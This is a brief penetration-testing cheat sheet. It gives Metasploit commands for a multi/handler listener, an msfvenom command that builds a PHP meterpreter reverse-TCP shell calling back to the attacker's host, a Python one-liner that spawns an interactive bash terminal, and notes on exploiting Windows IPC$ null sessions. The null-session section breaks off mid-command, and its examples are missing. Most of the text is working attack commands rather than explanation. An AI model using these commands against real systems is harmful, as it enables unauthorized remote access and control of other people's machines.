Metasploit
./ Handlers
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD <Payload name>
msf6 > set LHOST <LHOST value>
msf6 > set LPORT <LPORT value>
msf6 > set ExitOnSession false
msf6 > exploit -j -z
Once the required values are completed the following command will execute your handler: ‘msfconsole -L -r’
./ Scripting Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp lhost=<your-IP-address> lport=<your-port-address> -o shell.php
Python
./ Spawn a terminal
python -c 'import pty;pty.spawn("/bin/bash")';
Checking for Null Sessions
To verify that, we will exploit the IPC$ administrative share by trying to connect to it without valid credentials. To connect, you have to type the following command in a Windows shell: ```bash > NET USE \\
The previous command establishes a connection to the IPC$ administrative share without specifying a user; this is possible because our target host is vulnerable to null session attacks. This test only works with the IPC$. For example, it does not work with C$: Example:

You can also perform the very same checks by using smbclient:
